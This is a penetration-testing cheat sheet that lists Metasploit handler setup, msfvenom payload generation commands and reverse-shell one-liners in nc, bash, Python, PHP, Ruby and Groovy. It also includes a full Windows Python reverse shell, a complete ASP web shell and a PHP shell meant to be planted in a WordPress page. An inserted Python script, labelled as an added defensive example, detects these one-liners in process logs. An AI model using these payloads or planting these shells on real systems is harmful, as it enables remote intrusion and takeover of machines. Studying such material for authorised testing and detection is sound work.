Metasploit

Multi-handler

Start Metasploit:

msfconsole

Set multi handler module:

use exploit/multi/handler

Then set the payload (choose the one matching the target and the msfvenom payload used):

set payload windows/x64/shell/reverse_tcp
set payload windows/shell/reverse_tcp
set payload windows/meterpreter/reverse_tcp
set payload linux/x64/shell/reverse_tcp
set payload linux/x86/shell/reverse_tcp
set payload java/jsp_shell_reverse_tcp

Set the local (listening) host:

set LHOST <attacking-ipaddress>

Start:

run

Msfvenom

Common Payloads

msfvenom is run from the shell, outside msfconsole.

Linux reverse shell as C-formatted shellcode for buffer overflow use, with \x00 excluded as a bad character and encoded with shikata_ga_nai:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 -f c -b "\x00" -e x86/shikata_ga_nai

Linux reverse shell that spawns /bin/bash, output in js_le format with no encoder:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 CMD=/bin/bash -f js_le -e generic/none

Java JSP reverse shell packaged as a WAR file:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 -f war > shell.war

Windows ASP reverse shell:

msfvenom -p windows/shell_reverse_tcp -f asp LHOST=<attacking-ipaddress> LPORT=4444 -o shell.asp

Windows executable reverse shell (staged payload, so it needs the multi-handler above):

msfvenom -p windows/shell/reverse_tcp LHOST=<attacking-ipaddress> LPORT=4444 -e x86/shikata_ga_nai -f exe > shell.exe

Common Reverse Shells

Linux

NC

nc <ipaddress> <port> -e /bin/sh

NC (for netcat builds without -e)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ipaddress> <port> >/tmp/f;/tmp/f

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ipaddress>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i >& /dev/tcp/<ipaddress>/<port> 0>&1

PHP

php -r '$sock=fsockopen("<ipaddress>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

PHP ALT

php -r '$sock=fsockopen("<ipaddress>",<port>);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);'

PHP ALT 2

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ipaddress> <port> >/tmp/f'); ?>

PHP WordPress

<?php if(is_home()) { exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ipaddress> <port> >/tmp/f'); } ?>

Ruby

ruby -rsocket -e'f=TCPSocket.open("<ipaddress>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java (Groovy syntax)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ipaddress>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
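As an added defensive example (not part of the original cheat sheet), the following Python script classifies process command lines against the Linux reverse-shell one-liners listed above (plus the pty upgrade from the end of the page) and runs over a few constructed sample process-execution log lines; the log format `pid=... uid=... cmd=...` is an assumption standing in for whatever your EDR or auditd pipeline emits.

```python
import re

# Patterns derived from the one-liners on this page. Each entry is
# (technique name, compiled regex applied to a process command line).
REVERSE_SHELL_PATTERNS = [
    ("nc -e shell",        re.compile(r"\bnc(?:at)?\b.*\s-e\s*/bin/(?:ba)?sh")),
    ("mkfifo nc pipe",     re.compile(r"mkfifo\s+\S+.*\|\s*nc\s")),
    ("bash /dev/tcp",      re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("python socket dup2", re.compile(r"socket\.socket\(.*\.connect\(.*dup2\(")),
    ("php fsockopen",      re.compile(r"fsockopen\(.*(?:exec|proc_open)\(")),
    ("ruby TCPSocket",     re.compile(r"TCPSocket\.open\(.*exec\s+sprintf")),
    ("pty spawn upgrade",  re.compile(r"import\s+pty.*pty\.spawn\(")),
]

def classify_cmdline(cmdline):
    """Return the names of every pattern that matches one command line."""
    return [name for name, rx in REVERSE_SHELL_PATTERNS if rx.search(cmdline)]

def scan_log(lines):
    """Parse assumed 'pid=<n> uid=<n> cmd=<cmdline>' records; return (pid, uid, hits) per alert."""
    rec = re.compile(r"pid=(\d+)\s+uid=(\d+)\s+cmd=(.*)$")
    alerts = []
    for line in lines:
        m = rec.match(line.strip())
        if not m:
            continue
        hits = classify_cmdline(m.group(3))
        if hits:
            alerts.append((int(m.group(1)), int(m.group(2)), hits))
    return alerts

# Constructed sample process-execution log lines (not taken from any real system).
SAMPLE_LOG = [
    "pid=4011 uid=33 cmd=/bin/sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f",
    "pid=4012 uid=33 cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "pid=4013 uid=1000 cmd=nc -zv 10.0.0.9 443",
    "pid=4014 uid=33 cmd=python -c import pty; pty.spawn(\"/bin/bash\")",
    "pid=4015 uid=0 cmd=/usr/bin/python3 /opt/app/worker.py --socket /run/app.sock",
]

if __name__ == "__main__":
    for pid, uid, hits in scan_log(SAMPLE_LOG):
        print(f"pid={pid} uid={uid} -> {', '.join(hits)}")
```

The plain `nc -zv` line and the application worker are left alone, which is the point: alert on the shell-wiring idioms, not on every netcat or python invocation.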

Windows

NC

nc <ipaddress> <port> -e C:\Windows\System32\cmd.exe

Python

import socket, subprocess, threading

def s2p(s, p):
    # socket -> process stdin (flush, or Python 3 buffers the write)
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    # process stdout -> socket
    while True:
        s.send(p.stdout.read(1))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<ipaddress>", <port>))

p = subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

ASP

Credit: Maceo – maceo @ dogmile.com

<%@ Language=VBScript %>
<%
  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then

    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

  End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</BODY>
</HTML>

Fixing Shells

stty rows 39
stty columns 70
export TERM=xterm-256color

Upgrade to an interactive TTY:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'